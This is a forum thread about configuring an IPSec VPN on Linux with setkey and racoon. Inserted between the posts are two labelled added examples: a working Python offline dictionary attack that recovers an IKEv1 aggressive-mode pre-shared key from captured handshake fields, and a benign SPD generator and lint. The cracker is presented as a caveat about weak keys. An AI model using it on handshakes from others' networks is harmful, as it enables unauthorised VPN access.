Old 12-24-2004, 10:47 AM   #1
miscreant
LQ Newbie
 
Registered: Dec 2004
Location: Oh my god! Where am I?!
Distribution: Gentoo, Kubuntu
Posts: 10

Rep: Reputation: 0
Question Setting up IPSec VPN?


Hey everyone,

OK, I've been looking around for a good tutorial on this and although the pages at ipsec-howto.org do go through it a little, it's not in enough detail for me to get what I want working.

I'm running Gentoo with kernel 2.6.8, and have compiled with the required parameters and installed the ipsec-tools. But I'm finding the man pages and tutorials for setkey and racoon confusing.

Correct me if I'm wrong, but from what I understand, setkey creates the IPSec routing entries and the racoon daemon does this dynamically for you when you try to access a site requiring IPSec?

Anyway, here's what I want to do, I'm hoping someone can offer some pointers.

My work has 2 networks that I need to connect to over the VPN. 192.168.50.xxx and 170.20.75.xxx. These both have the same gateway server we'll call a.b.c.d.

The connection is established using a pre-shared key, encrypted with 3des, and hashed with sha-1.

My computer at home is on a cable modem router (NAT) with a dynamic IP.

So what I want is for the IPSec to kick in ONLY when I try to access an address within the 2 networks above (192.168.50.xxx/172.20.75.xxx), preferably without me having to run a script or anything to start it (but it's not a big deal if I have to).

So, now some questions:
First of all, do I need to be using racoon? Or can setkey do all this at startup or via a script?
What would the structure of the setkey commands be?
If setkey can be used alone, how do I generate the keys from the pre-shared key phrase?
If I have to use racoon, how should the racoon.conf file look? I think one of the most confusing things in that file is when you need to use the gateway address (a.b.c.d) and when you have to use your own IP address (which I would prefer not to hard code since it's dynamic)

This is my first time playing around with the IPSec stuff, so go easy on me!

thanks,
miscreant
 
Old 12-24-2004, 04:40 PM   #2
miscreant
LQ Newbie
 
Registered: Dec 2004
Location: Oh my god! Where am I?!
Distribution: Gentoo, Kubuntu
Posts: 10

Original Poster
Rep: Reputation: 0
Mostly solved

OK, because I hate it when I find these questions on the internet with no answers, I will now answer my own question.

So a little more research and this is what I came up with. First of all, it turns out racoon is required. You can set up IPSec using just setkey, but then the keys never change. I hadn't realized that the "pre-shared key" is not the same as the "key" in the setkey commands.

Anyway, so the first part of this turned out to be creating the ipsec.conf file and filling it with the correct policy. Setkey was confusing because it has the SAD and SPD items. The add command enters SADs and the spdadd command enters SPDs. Turns out I don't need any SADs because racoon is going to generate those on the fly using my pre-shared key.

So, my ipsec.conf file looks like this:
Code:
#!/usr/sbin/setkey -f

# Start from an empty SAD and SPD so stale entries don't shadow these.
flush;
spdflush;

# Work network 1: outbound traffic from this host is tunnelled in ESP to
# the gateway; inbound traffic arrives in ESP from the gateway.
spdadd 192.168.1.89 192.168.50.0/24 any
    -P out ipsec esp/tunnel/192.168.1.89-a.b.c.d/require;

spdadd 192.168.50.0/24 192.168.1.89 any
    -P in ipsec esp/tunnel/a.b.c.d-192.168.1.89/require;

# Work network 2: same gateway, same pair of mirrored policies.
spdadd 192.168.1.89 172.20.75.0/24 any
    -P out ipsec esp/tunnel/192.168.1.89-a.b.c.d/require;

spdadd 172.20.75.0/24 192.168.1.89 any
    -P in ipsec esp/tunnel/a.b.c.d-192.168.1.89/require;
This basically just tells the IPSec that it should encode/decode and tunnel anything going to or coming from 192.168.50.* or 172.20.75.*

You might notice the hardcoded ip address (192.168.1.89) from my local network. I haven't quite found a way around that, but since I can use the hardcoded IP address of my computer on my local network, not having to worry about my router's dynamic IP, it became less of a problem. If I find a solution for it, I'll put it here. I tried using 0.0.0.0, which would connect and create the key, but would not decrypt any data returned.

I then ran that file with:
Code:
setkey -f ipsec.conf
Now for the racoon.conf:

Code:
# search this file for pre_shared_key with various ID key.
path pre_shared_key "/etc/racoon/psk.txt";

# if no listen directive is specified, racoon will listen to all
# available interface addresses.

remote anonymous
{
        exchange_mode aggressive,main;
        doi ipsec_doi;
        situation identity_only;
        generate_policy on;
        proposal_check obey;

        my_identifier user_fqdn "myemail@mycompany.com";

        proposal {
                encryption_algorithm 3des;
                hash_algorithm sha1;
                authentication_method pre_shared_key;
                dh_group 2;
        }
}

sainfo anonymous
{
        encryption_algorithm 3des;
        authentication_algorithm hmac_sha1;
        compression_algorithm deflate;
}
The exchange mode must be aggressive, and I think proposal_check has to be obey. generate_policy is set to on so that racoon will generate the SADs required when you attempt to connect to the networks.

My psk.txt file is simply one line:
Code:
a.b.c.d       My_Pre_Shared_Key
So now I'll set up the setkey script and racoon daemon to run at startup and all should be well.

One point to mention is that the first time I attempt to do something that requires a connection, it fails. So for example if I try:
Code:
ping 192.168.50.15
I'll get an error saying the connection is temporarily unavailable. racoon is actually generating the keys and SADs the first connection attempt. After that it seems to work fine.

Hope this helps somebody.
miscreant
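A caveat on the racoon.conf above, with an added example that is not part of the thread. The configuration authenticates with a pre-shared key in aggressive mode, which racoon needs here because the client's address is dynamic and the PSK is looked up by identity rather than by IP. The cost is that in aggressive mode the responder's HASH_R, its ID payload, both nonces, both cookies, both DH public values and the initiator's SA payload all travel unencrypted (RFC 2409, sections 5.4 and 5.7), so anyone who captures the handshake can test PSK guesses offline without talking to the gateway. Main mode sends HASH_R encrypted, and racoon's `authentication_method rsasig` removes the dictionary attack entirely. The code below implements the RFC 2409 derivation (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), prf = HMAC-SHA1 for hash_algorithm sha1) and runs a wordlist against a constructed capture. All nonce, cookie, DH, SA-payload and ID bytes are fixed stand-ins chosen for reproducibility; real values are random and, for dh_group 2, 128 bytes long.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode PSK exchange.

Added example, not code from the thread. The capture is constructed: the
byte strings stand in for the fields an eavesdropper reads off the wire.
"""
import hashlib
import hmac


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf for hash_algorithm sha1 is HMAC-SHA1 (RFC 2409 section 4)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """PSK authentication: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def hash_r(psk: bytes, x: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, x["ni_b"], x["nr_b"])
    return prf(skeyid, x["g_xr"] + x["g_xi"] + x["cky_r"] + x["cky_i"]
               + x["sai_b"] + x["idir_b"])


def capture_exchange(psk: bytes) -> dict:
    """Visible fields of an aggressive-mode exchange (constructed stand-ins).

    Every field here is sent in the clear in aggressive mode; the attacker
    does not need the DH private values, only the public ones.
    """
    x = {
        "cky_i": bytes.fromhex("0102030405060708"),       # initiator cookie
        "cky_r": bytes.fromhex("a1a2a3a4a5a6a7a8"),       # responder cookie
        "ni_b": hashlib.sha1(b"initiator nonce").digest(),
        "nr_b": hashlib.sha1(b"responder nonce").digest(),
        "g_xi": hashlib.sha256(b"g^xi").digest() * 4,    # 128-byte stand-in
        "g_xr": hashlib.sha256(b"g^xr").digest() * 4,    # for a group-2 value
        # SAi_b: initiator SA payload body (3des/sha1/psk/group 2 proposal);
        # stand-in bytes, not a real proposal encoding.
        "sai_b": b"\x00\x00\x00\x01" + b"\x00" * 4 + b"3des-sha1-psk-dh2",
        # IDir_b: ID payload body = type(1) proto(1) port(2) data. Type 1 is
        # ID_IPV4_ADDR; the four zero bytes stand in for the gateway address.
        "idir_b": bytes([1, 0, 0, 0]) + bytes(4),
    }
    # Sent in the clear by the responder in aggressive-mode message 2.
    x["hash_r"] = hash_r(psk, x)
    return x


def crack_psk(x: dict, wordlist):
    """Return the first candidate whose HASH_R matches the capture, else None."""
    for cand in wordlist:
        if hash_r(cand, x) == x["hash_r"]:
            return cand
    return None


if __name__ == "__main__":
    capture = capture_exchange(b"My_Pre_Shared_Key")
    words = [b"password", b"vpn2004", b"My_Pre_Shared_Key", b"letmein"]
    print("recovered PSK:", crack_psk(capture, words))
```

Each guess costs two HMAC-SHA1 computations and nothing on the network, so the only defence a PSK has in this mode is its entropy; a passphrase that a wordlist would find is recovered by a passive observer of a single handshake.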
 
Old 06-14-2010, 09:49 PM   #3
danmartinj
LQ Newbie
 
Registered: Oct 2009
Posts: 24

Rep: Reputation: 0
Good Tutorial

I know it's a little late but this is good information!
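Two loose ends from the ipsec.conf in the second post above, the hard-coded local address and the need for every `out` policy to have an exact mirror `in` policy, can be handled with a small generator and lint. The following is an added example, not code from the thread or from ipsec-tools. It reads the local address from the `src` field of `ip route get <gateway>` output (a constructed sample is embedded), emits the same mirrored spdadd pairs the post uses, and checks any setkey text for policies whose counterpart is missing or has swapped tunnel endpoints, which is exactly the situation where traffic goes out encrypted but replies never decrypt. The gateway is left as the thread's `a.b.c.d` placeholder.

```python
"""Generate and lint a setkey SPD for a policy-based ESP tunnel.

Added example, not part of the thread. ROUTE_SAMPLE is a constructed copy
of what `ip route get a.b.c.d` prints on a typical Linux host.
"""
import re

ROUTE_SAMPLE = "a.b.c.d via 192.168.1.1 dev eth0 src 192.168.1.89 uid 1000\n    cache\n"

# spdadd SRC DST UPPER -P DIR ipsec esp/tunnel/TUNSRC-TUNDST/LEVEL;
SPDADD_RE = re.compile(
    r"spdadd\s+(\S+)\s+(\S+)\s+(\S+)\s+-P\s+(in|out)\s+ipsec\s+"
    r"esp/tunnel/([^-\s]+)-([^/\s]+)/(\w+)\s*;"
)


def local_addr_from_route(route_output: str) -> str:
    """Return the preferred source address from `ip route get` output."""
    m = re.search(r"\bsrc\s+(\d{1,3}(?:\.\d{1,3}){3})\b", route_output)
    if not m:
        raise ValueError("no 'src' field in route output")
    return m.group(1)


def gen_spd(local_ip: str, gateway: str, remote_nets, level="require") -> str:
    """Emit a setkey script with one mirrored in/out policy pair per remote net."""
    lines = ["#!/usr/sbin/setkey -f", "", "flush;", "spdflush;", ""]
    for net in remote_nets:
        lines += [
            f"spdadd {local_ip} {net} any",
            f"    -P out ipsec esp/tunnel/{local_ip}-{gateway}/{level};",
            "",
            f"spdadd {net} {local_ip} any",
            f"    -P in ipsec esp/tunnel/{gateway}-{local_ip}/{level};",
            "",
        ]
    return "\n".join(lines)


def parse_spd(text: str):
    """Parse every spdadd statement in setkey text into a dict."""
    keys = ("src", "dst", "upper", "dir", "tun_src", "tun_dst", "level")
    return [dict(zip(keys, m)) for m in SPDADD_RE.findall(text)]


def unmirrored(text: str):
    """Policies with no exact counterpart in the other direction.

    An 'in' policy mirrors an 'out' policy when both the selector and the
    tunnel endpoints are swapped. Each 'in' is rewritten in out-orientation
    and the symmetric difference of the two sets is returned.
    """
    outs, ins = set(), set()
    for p in parse_spd(text):
        if p["dir"] == "out":
            outs.add((p["src"], p["dst"], p["upper"],
                      p["tun_src"], p["tun_dst"], p["level"]))
        else:
            ins.add((p["dst"], p["src"], p["upper"],
                     p["tun_dst"], p["tun_src"], p["level"]))
    return sorted(outs ^ ins)


if __name__ == "__main__":
    me = local_addr_from_route(ROUTE_SAMPLE)
    cfg = gen_spd(me, "a.b.c.d", ["192.168.50.0/24", "172.20.75.0/24"])
    print(cfg)
    print("unmirrored policies:", unmirrored(cfg))
```

Run the script at boot before racoon starts and feed its output to `setkey -f`; after racoon has negotiated, `setkey -DP` shows the installed policies and `setkey -D` the SAs it generated.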
 